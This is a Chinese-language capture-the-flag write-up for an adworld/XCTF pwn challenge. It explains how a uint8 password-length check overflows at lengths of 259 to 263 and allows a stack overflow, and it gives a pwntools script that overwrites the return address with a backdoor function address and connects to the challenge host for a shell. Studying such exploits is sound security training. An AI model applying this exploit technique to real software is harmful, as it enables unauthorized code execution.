原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=1
如图,程序是一个32位ELF文件
chesec,开启了栈保护
ida反编译,main方法中实现了登录功能,无溢出点
login方法中输入用户名和密码:
这里位数上0x19<40,0x199<512,因此无溢出
check_passwd实现对密码长度进行检查:
密码长度为4-8之间,是一个uint8,范围为0-255
由于255<密码长度0x199,因此存在整数溢出,令密码长度在259-263之间即可顺利赋值给dest,dest没有长度检查,存在栈溢出漏洞
后门函数在这里
地址为:
溢出点栈帧结构:
因此不考虑密码位数时构造b“A”*(0x14+4)*A+0x0804868B长度(0x14+4)+4
令密码长度构造为262位,262-(0x14+4)-4=234,还需填充234位
因此密码填写:b“A”*(0x14+4)+0x0804868B+b"A"*234
代码如下所示:
from pwn import *
host = '111.200.241.244'
port = 55687
p = connect(host, port)
payload = b'A' * (0x14 + 4) + p32(0x804868B)+b'A'*234
p.sendlineafter("Your choice:", '1')
p.sendlineafter("Please input your username:\n", "111")
p.sendlineafter("Please input your passwd:\n", payload)
p.interactive()
如图,获取成功